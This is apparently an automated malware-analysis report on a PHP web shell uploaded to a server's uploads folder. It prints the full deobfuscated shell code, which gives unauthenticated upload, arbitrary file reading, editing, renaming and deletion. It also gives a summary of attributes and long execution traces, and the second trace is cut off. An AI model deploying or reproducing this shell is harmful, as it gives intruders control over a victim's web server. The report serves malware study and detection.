PHP Malware Analysis
321.phtml, 9321.phtml
md5: eee2d486de6cc441356c08015da5d621
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- set_time_limit (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- Kontol Njepat (Deobfuscated, HTML, Original)
URLs
- http://web-not404foundcyberteam.gq (Deobfuscated, HTML, Original)
- https://fonts.googleapis.com/css?family=VT323 (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
set_time_limit(0);
error_reporting(0);
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
?>
<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>Kontol Njepat </title>
<link href='https://fonts.googleapis.com/css?family=VT323' rel='stylesheet'>
<style type="text/css">body{background: #263238;color:#eceff1;font-family:'Courier';margin:0;font-size: 14px;}h1{font-family:'VT323';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:'Courier'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>
</head><body> <?php
echo "<div style=\"color:#ef6c00;margin-top:0;\"><h1><center>Indramayu IT Comunity</center></h1></div>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
chdir($_GET['path']);
} else {
$path = getcwd();
}
$path = str_replace("\\", "/", $path);
$paths = explode("/", $path);
echo "<table width=\"100%\" border=\"0\" align=\"center\" style=\"margin-top:-10px;\"><tr><td>";
echo "<font style='font-size:13px;'>Path: ";
foreach ($paths as $id => $pat) {
echo "<a style='font-size:13px;' href='?path=";
for ($i = 0; $i <= $id; $i++) {
echo $paths[$i];
if ($i != $id) {
echo "/";
}
}
echo "'>{$pat}</a>/";
}
echo "<br>[ <a href=\"?\">Home</a> ]</font></td><td align=\"center\" width=\"27%\"><form enctype=\"multipart/form-data\" method=\"POST\"><input type=\"file\" name=\"file\" style=\"color:#ef6c00;margin-bottom:4px;\"/>\r\n<input type=\"submit\" value=\"Upload\" /></form></td></tr><tr><td colspan=\"2\">";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<center><font color=\"#00ff00\">Upload succes:)</font></center><br/>";
} else {
echo "<center><font color=\"red\">Upload Failed:(</font></center><br/>";
}
}
echo "</td></tr><tr><td></table>";
if (isset($_GET['filesrc'])) {
echo "<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td>File: ";
echo "" . basename($_GET['filesrc']);
"";
echo "</tr></td></table><br />";
echo "<center><textarea readonly=''>" . htmlspecialchars(file_get_contents($_GET['filesrc'])) . "</textarea></center>";
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<center><font color=\"#00ff00\">Rename OK!</font></center><br />";
} else {
echo "<center><font color=\"red\">Rename Failed!</font></center><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<center><font color=\"#00ff00\">Edit File OK!.</font></center><br />";
} else {
echo "<center><font color=\"red\">Edit File Failed!.</font></center><br />";
}
fclose($fp);
}
echo '<form method="POST"><textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br /><input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>';
}
echo "</center>";
} else {
echo "</table><br /><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "<center><font color=\"#00ff00\">Dir Deleted!</font></center><br />";
} else {
echo "<center><font color=\"red\">Delete Dir Failed!</font></center><br />";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "<font color=\"#00ff00\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
}
echo "</center>";
$scandir = scandir($path);
echo "<div id=\"content\"><table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\">\r\n<th><center>Name</center></th><th width=\"12%\"><center>Size</center></th><th width=\"10%\"><center>Permissions</center></th>\r\n<th width=\"15%\"><center>Last Update</center></th><th width=\"11%\"><center>Options</center></th></tr>";
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr><td>[D] <a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td><center>--</center></td><td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"#00ff00\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . "";
echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"{$dir}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
}
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "<tr><td>[F] <a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td><td><center>" . $size . "</center></td><td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"#00ff00\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$file}")) . "";
echo "</center></td><td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"{$file}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
}
echo "</table></div>";
}
echo "</body></html>";
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
echo "<br><center>Djancok Koe shell <a href=\"http://web-not404foundcyberteam.gq\">Recoded by dedidarmadi678</a>.</center><br>";Execution traces
data/traces/eee2d486de6cc441356c08015da5d621_trace-1676249150.54.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:46:16.437837]
1 0 1 0.000146 393512
1 3 0 0.000421 441056 {main} 1 /var/www/html/uploads/321.phtml 0 0
2 4 0 0.000438 441056 set_time_limit 0 /var/www/html/uploads/321.phtml 2 1 0
2 4 1 0.000456 441120
2 4 R FALSE
2 5 0 0.000470 441088 error_reporting 0 /var/www/html/uploads/321.phtml 3 1 0
2 5 1 0.000484 441128
2 5 R 22527
2 6 0 0.000497 441088 get_magic_quotes_gpc 0 /var/www/html/uploads/321.phtml 4 0
2 6 1 0.000509 441088
2 6 R FALSE
2 7 0 0.000524 441088 getcwd 0 /var/www/html/uploads/321.phtml 10 0
2 7 1 0.000537 441136
2 7 R '/var/www/html/uploads'
1 A /var/www/html/uploads/321.phtml 10 $path = '/var/www/html/uploads'
2 8 0 0.000565 441136 str_replace 0 /var/www/html/uploads/321.phtml 11 3 '\\' '/' '/var/www/html/uploads'
2 8 1 0.000581 441232
2 8 R '/var/www/html/uploads'
1 A /var/www/html/uploads/321.phtml 11 $path = '/var/www/html/uploads'
2 9 0 0.000606 441136 explode 0 /var/www/html/uploads/321.phtml 11 2 '/' '/var/www/html/uploads'
2 9 1 0.000619 441712
2 9 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/321.phtml 11 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/321.phtml 13 $id = 0
1 A /var/www/html/uploads/321.phtml 14 $i = 0
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 13 $id = 1
1 A /var/www/html/uploads/321.phtml 14 $i = 0
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 13 $id = 2
1 A /var/www/html/uploads/321.phtml 14 $i = 0
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 13 $id = 3
1 A /var/www/html/uploads/321.phtml 14 $i = 0
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 13 $id = 4
1 A /var/www/html/uploads/321.phtml 14 $i = 0
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 14 $i++
1 A /var/www/html/uploads/321.phtml 14 $i++
2 10 0 0.000861 441640 scandir 0 /var/www/html/uploads/321.phtml 49 1 '/var/www/html/uploads'
2 10 1 0.000892 442264
2 10 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '321.phtml', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/321.phtml 49 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '321.phtml', 4 => 'data', 5 => 'prepend.php']
2 11 0 0.000930 442280 is_dir 0 /var/www/html/uploads/321.phtml 54 1 '/var/www/html/uploads/.'
2 11 1 0.000946 442344
2 11 R TRUE
2 12 0 0.000960 442312 is_dir 0 /var/www/html/uploads/321.phtml 54 1 '/var/www/html/uploads/..'
2 12 1 0.000974 442360
2 12 R TRUE
2 13 0 0.000988 442320 is_dir 0 /var/www/html/uploads/321.phtml 54 1 '/var/www/html/uploads/.htaccess'
2 13 1 0.001003 442360
2 13 R FALSE
2 14 0 0.001016 442320 is_dir 0 /var/www/html/uploads/321.phtml 54 1 '/var/www/html/uploads/321.phtml'
2 14 1 0.001031 442360
2 14 R FALSE
2 15 0 0.001043 442320 is_dir 0 /var/www/html/uploads/321.phtml 54 1 '/var/www/html/uploads/data'
2 15 1 0.001057 442360
2 15 R TRUE
2 16 0 0.001071 442320 is_writable 0 /var/www/html/uploads/321.phtml 56 1 '/var/www/html/uploads/data'
2 16 1 0.001088 442360
2 16 R TRUE
2 17 0 0.001102 442320 perms 1 /var/www/html/uploads/321.phtml 58 1 '/var/www/html/uploads/data'
3 18 0 0.001115 442320 fileperms 0 /var/www/html/uploads/321.phtml 72 1 '/var/www/html/uploads/data'
3 18 1 0.001128 442360
3 18 R 16895
2 A /var/www/html/uploads/321.phtml 72 $perms = 16895
2 A /var/www/html/uploads/321.phtml 72 $info = 'd'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'x'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'x'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'x'
2 17 1 0.001251 442360
2 17 R 'drwxrwxrwx'
2 19 0 0.001266 442320 is_writable 0 /var/www/html/uploads/321.phtml 59 1 '/var/www/html/uploads/data'
2 19 1 0.001281 442360
2 19 R TRUE
2 20 0 0.001295 442320 filemtime 0 /var/www/html/uploads/321.phtml 60 1 '/var/www/html/uploads/data'
2 20 1 0.001308 442360
2 20 R 1676249150
2 21 0 0.001321 442264 date 0 /var/www/html/uploads/321.phtml 60 2 'd-M-Y H:i' 1676249150
2 21 1 0.001376 444656
2 21 R '12-Feb-2023 19:45'
2 22 0 0.001395 444392 is_dir 0 /var/www/html/uploads/321.phtml 54 1 '/var/www/html/uploads/prepend.php'
2 22 1 0.001412 444440
2 22 R FALSE
2 23 0 0.001426 444384 is_file 0 /var/www/html/uploads/321.phtml 62 1 '/var/www/html/uploads/.'
2 23 1 0.001439 444408
2 23 R FALSE
2 24 0 0.001453 444376 is_file 0 /var/www/html/uploads/321.phtml 62 1 '/var/www/html/uploads/..'
2 24 1 0.001467 444424
2 24 R FALSE
2 25 0 0.001480 444384 is_file 0 /var/www/html/uploads/321.phtml 62 1 '/var/www/html/uploads/.htaccess'
2 25 1 0.001495 444424
2 25 R TRUE
2 26 0 0.001507 444384 filesize 0 /var/www/html/uploads/321.phtml 62 1 '/var/www/html/uploads/.htaccess'
2 26 1 0.001521 444424
2 26 R 64
1 A /var/www/html/uploads/321.phtml 62 $size = 0.0625
2 27 0 0.001545 444328 round 0 /var/www/html/uploads/321.phtml 63 2 0.0625 3
2 27 1 0.001558 444400
2 27 R 0.063
1 A /var/www/html/uploads/321.phtml 63 $size = 0.063
1 A /var/www/html/uploads/321.phtml 63 $size = '0.063 KB'
2 28 0 0.001595 444424 is_writable 0 /var/www/html/uploads/321.phtml 65 1 '/var/www/html/uploads/.htaccess'
2 28 1 0.001612 444464
2 28 R FALSE
2 29 0 0.001625 444424 is_readable 0 /var/www/html/uploads/321.phtml 66 1 '/var/www/html/uploads/.htaccess'
2 29 1 0.001640 444464
2 29 R TRUE
2 30 0 0.001654 444424 perms 1 /var/www/html/uploads/321.phtml 67 1 '/var/www/html/uploads/.htaccess'
3 31 0 0.001667 444424 fileperms 0 /var/www/html/uploads/321.phtml 72 1 '/var/www/html/uploads/.htaccess'
3 31 1 0.001679 444464
3 31 R 33188
2 A /var/www/html/uploads/321.phtml 72 $perms = 33188
2 A /var/www/html/uploads/321.phtml 72 $info = '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= '-'
2 30 1 0.001803 444464
2 30 R '-rw-r--r--'
2 32 0 0.001818 444424 is_writable 0 /var/www/html/uploads/321.phtml 68 1 '/var/www/html/uploads/.htaccess'
2 32 1 0.001834 444464
2 32 R FALSE
2 33 0 0.001847 444424 is_readable 0 /var/www/html/uploads/321.phtml 68 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.001862 444464
2 33 R TRUE
2 34 0 0.001875 444424 filemtime 0 /var/www/html/uploads/321.phtml 69 1 '/var/www/html/uploads/.htaccess'
2 34 1 0.001888 444464
2 34 R 1676249150
2 35 0 0.001901 444368 date 0 /var/www/html/uploads/321.phtml 69 2 'd-M-Y H:i' 1676249150
2 35 1 0.001932 444696
2 35 R '12-Feb-2023 19:45'
2 36 0 0.001948 444424 is_file 0 /var/www/html/uploads/321.phtml 62 1 '/var/www/html/uploads/321.phtml'
2 36 1 0.001962 444464
2 36 R TRUE
2 37 0 0.001975 444424 filesize 0 /var/www/html/uploads/321.phtml 62 1 '/var/www/html/uploads/321.phtml'
2 37 1 0.001987 444464
2 37 R 7810
1 A /var/www/html/uploads/321.phtml 62 $size = 7.626953125
2 38 0 0.002014 444328 round 0 /var/www/html/uploads/321.phtml 63 2 7.626953125 3
2 38 1 0.002061 444400
2 38 R 7.627
1 A /var/www/html/uploads/321.phtml 63 $size = 7.627
1 A /var/www/html/uploads/321.phtml 63 $size = '7.627 KB'
2 39 0 0.002105 444424 is_writable 0 /var/www/html/uploads/321.phtml 65 1 '/var/www/html/uploads/321.phtml'
2 39 1 0.002121 444464
2 39 R FALSE
2 40 0 0.002134 444424 is_readable 0 /var/www/html/uploads/321.phtml 66 1 '/var/www/html/uploads/321.phtml'
2 40 1 0.002148 444464
2 40 R TRUE
2 41 0 0.002161 444424 perms 1 /var/www/html/uploads/321.phtml 67 1 '/var/www/html/uploads/321.phtml'
3 42 0 0.002173 444424 fileperms 0 /var/www/html/uploads/321.phtml 72 1 '/var/www/html/uploads/321.phtml'
3 42 1 0.002185 444464
3 42 R 33204
2 A /var/www/html/uploads/321.phtml 72 $perms = 33204
2 A /var/www/html/uploads/321.phtml 72 $info = '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= '-'
2 41 1 0.002299 444464
2 41 R '-rw-rw-r--'
2 43 0 0.002313 444424 is_writable 0 /var/www/html/uploads/321.phtml 68 1 '/var/www/html/uploads/321.phtml'
2 43 1 0.002327 444464
2 43 R FALSE
2 44 0 0.002340 444424 is_readable 0 /var/www/html/uploads/321.phtml 68 1 '/var/www/html/uploads/321.phtml'
2 44 1 0.002355 444464
2 44 R TRUE
2 45 0 0.002368 444424 filemtime 0 /var/www/html/uploads/321.phtml 69 1 '/var/www/html/uploads/321.phtml'
2 45 1 0.002380 444464
2 45 R 1676249150
2 46 0 0.002393 444368 date 0 /var/www/html/uploads/321.phtml 69 2 'd-M-Y H:i' 1676249150
2 46 1 0.002423 444696
2 46 R '12-Feb-2023 19:45'
2 47 0 0.002439 444424 is_file 0 /var/www/html/uploads/321.phtml 62 1 '/var/www/html/uploads/data'
2 47 1 0.002453 444464
2 47 R FALSE
2 48 0 0.002466 444432 is_file 0 /var/www/html/uploads/321.phtml 62 1 '/var/www/html/uploads/prepend.php'
2 48 1 0.002481 444480
2 48 R TRUE
2 49 0 0.002494 444440 filesize 0 /var/www/html/uploads/321.phtml 62 1 '/var/www/html/uploads/prepend.php'
2 49 1 0.002507 444480
2 49 R 57
1 A /var/www/html/uploads/321.phtml 62 $size = 0.0556640625
2 50 0 0.002532 444336 round 0 /var/www/html/uploads/321.phtml 63 2 0.0556640625 3
2 50 1 0.002545 444408
2 50 R 0.056
1 A /var/www/html/uploads/321.phtml 63 $size = 0.056
1 A /var/www/html/uploads/321.phtml 63 $size = '0.056 KB'
2 51 0 0.002580 444440 is_writable 0 /var/www/html/uploads/321.phtml 65 1 '/var/www/html/uploads/prepend.php'
2 51 1 0.002596 444480
2 51 R FALSE
2 52 0 0.002609 444440 is_readable 0 /var/www/html/uploads/321.phtml 66 1 '/var/www/html/uploads/prepend.php'
2 52 1 0.002624 444480
2 52 R TRUE
2 53 0 0.002637 444440 perms 1 /var/www/html/uploads/321.phtml 67 1 '/var/www/html/uploads/prepend.php'
3 54 0 0.002650 444440 fileperms 0 /var/www/html/uploads/321.phtml 72 1 '/var/www/html/uploads/prepend.php'
3 54 1 0.002663 444480
3 54 R 33261
2 A /var/www/html/uploads/321.phtml 72 $perms = 33261
2 A /var/www/html/uploads/321.phtml 72 $info = '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'x'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'x'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/321.phtml 72 $info .= 'x'
2 53 1 0.002778 444480
2 53 R '-rwxr-xr-x'
2 55 0 0.002792 444440 is_writable 0 /var/www/html/uploads/321.phtml 68 1 '/var/www/html/uploads/prepend.php'
2 55 1 0.002808 444480
2 55 R FALSE
2 56 0 0.002822 444440 is_readable 0 /var/www/html/uploads/321.phtml 68 1 '/var/www/html/uploads/prepend.php'
2 56 1 0.002837 444480
2 56 R TRUE
2 57 0 0.002850 444440 filemtime 0 /var/www/html/uploads/321.phtml 69 1 '/var/www/html/uploads/prepend.php'
2 57 1 0.002864 444480
2 57 R 1676249150
2 58 0 0.002877 444376 date 0 /var/www/html/uploads/321.phtml 69 2 'd-M-Y H:i' 1676249150
2 58 1 0.002911 444704
2 58 R '12-Feb-2023 19:45'
1 3 1 0.002935 444488
0.002972 326160
TRACE END [2023-02-12 22:46:16.440693]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:32:01.750309]
1 0 1 0.000169 393528
1 3 0 0.000448 441080 {main} 1 /var/www/html/uploads/9321.phtml 0 0
2 4 0 0.000468 441080 set_time_limit 0 /var/www/html/uploads/9321.phtml 2 1 0
2 4 1 0.000495 441144
2 4 R FALSE
2 5 0 0.000510 441112 error_reporting 0 /var/www/html/uploads/9321.phtml 3 1 0
2 5 1 0.000524 441152
2 5 R 22527
2 6 0 0.000536 441112 get_magic_quotes_gpc 0 /var/www/html/uploads/9321.phtml 4 0
2 6 1 0.000548 441112
2 6 R FALSE
2 7 0 0.000563 441112 getcwd 0 /var/www/html/uploads/9321.phtml 10 0
2 7 1 0.000576 441160
2 7 R '/var/www/html/uploads'
1 A /var/www/html/uploads/9321.phtml 10 $path = '/var/www/html/uploads'
2 8 0 0.000605 441160 str_replace 0 /var/www/html/uploads/9321.phtml 11 3 '\\' '/' '/var/www/html/uploads'
2 8 1 0.000781 441256
2 8 R '/var/www/html/uploads'
1 A /var/www/html/uploads/9321.phtml 11 $path = '/var/www/html/uploads'
2 9 0 0.000810 441160 explode 0 /var/www/html/uploads/9321.phtml 11 2 '/' '/var/www/html/uploads'
2 9 1 0.000825 441736
2 9 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/9321.phtml 11 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/9321.phtml 13 $id = 0
1 A /var/www/html/uploads/9321.phtml 14 $i = 0
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 13 $id = 1
1 A /var/www/html/uploads/9321.phtml 14 $i = 0
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 13 $id = 2
1 A /var/www/html/uploads/9321.phtml 14 $i = 0
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 13 $id = 3
1 A /var/www/html/uploads/9321.phtml 14 $i = 0
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 13 $id = 4
1 A /var/www/html/uploads/9321.phtml 14 $i = 0
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 14 $i++
1 A /var/www/html/uploads/9321.phtml 14 $i++
2 10 0 0.001073 441664 scandir 0 /var/www/html/uploads/9321.phtml 49 1 '/var/www/html/uploads'
2 10 1 0.001116 442288
2 10 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '9321.phtml', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/9321.phtml 49 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '9321.phtml', 4 => 'data', 5 => 'prepend.php']
2 11 0 0.001155 442304 is_dir 0 /var/www/html/uploads/9321.phtml 54 1 '/var/www/html/uploads/.'
2 11 1 0.001173 442368
2 11 R TRUE
2 12 0 0.001188 442336 is_dir 0 /var/www/html/uploads/9321.phtml 54 1 '/var/www/html/uploads/..'
2 12 1 0.001203 442384
2 12 R TRUE
2 13 0 0.001217 442344 is_dir 0 /var/www/html/uploads/9321.phtml 54 1 '/var/www/html/uploads/.htaccess'
2 13 1 0.001232 442384
2 13 R FALSE
2 14 0 0.001245 442352 is_dir 0 /var/www/html/uploads/9321.phtml 54 1 '/var/www/html/uploads/9321.phtml'
2 14 1 0.001259 442400
2 14 R FALSE
2 15 0 0.001271 442352 is_dir 0 /var/www/html/uploads/9321.phtml 54 1 '/var/www/html/uploads/data'
2 15 1 0.001286 442384
2 15 R TRUE
2 16 0 0.001300 442344 is_writable 0 /var/www/html/uploads/9321.phtml 56 1 '/var/www/html/uploads/data'
2 16 1 0.001321 442384
2 16 R TRUE
2 17 0 0.001336 442344 perms 1 /var/www/html/uploads/9321.phtml 58 1 '/var/www/html/uploads/data'
3 18 0 0.001350 442344 fileperms 0 /var/www/html/uploads/9321.phtml 72 1 '/var/www/html/uploads/data'
3 18 1 0.001363 442384
3 18 R 16895
2 A /var/www/html/uploads/9321.phtml 72 $perms = 16895
2 A /var/www/html/uploads/9321.phtml 72 $info = 'd'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'x'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'x'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'x'
2 17 1 0.001490 442384
2 17 R 'drwxrwxrwx'
2 19 0 0.001505 442344 is_writable 0 /var/www/html/uploads/9321.phtml 59 1 '/var/www/html/uploads/data'
2 19 1 0.001521 442384
2 19 R TRUE
2 20 0 0.001535 442344 filemtime 0 /var/www/html/uploads/9321.phtml 60 1 '/var/www/html/uploads/data'
2 20 1 0.001549 442384
2 20 R 1676251895
2 21 0 0.001562 442288 date 0 /var/www/html/uploads/9321.phtml 60 2 'd-M-Y H:i' 1676251895
2 21 1 0.001697 444680
2 21 R '12-Feb-2023 20:31'
2 22 0 0.001718 444416 is_dir 0 /var/www/html/uploads/9321.phtml 54 1 '/var/www/html/uploads/prepend.php'
2 22 1 0.001736 444464
2 22 R FALSE
2 23 0 0.001750 444408 is_file 0 /var/www/html/uploads/9321.phtml 62 1 '/var/www/html/uploads/.'
2 23 1 0.001764 444432
2 23 R FALSE
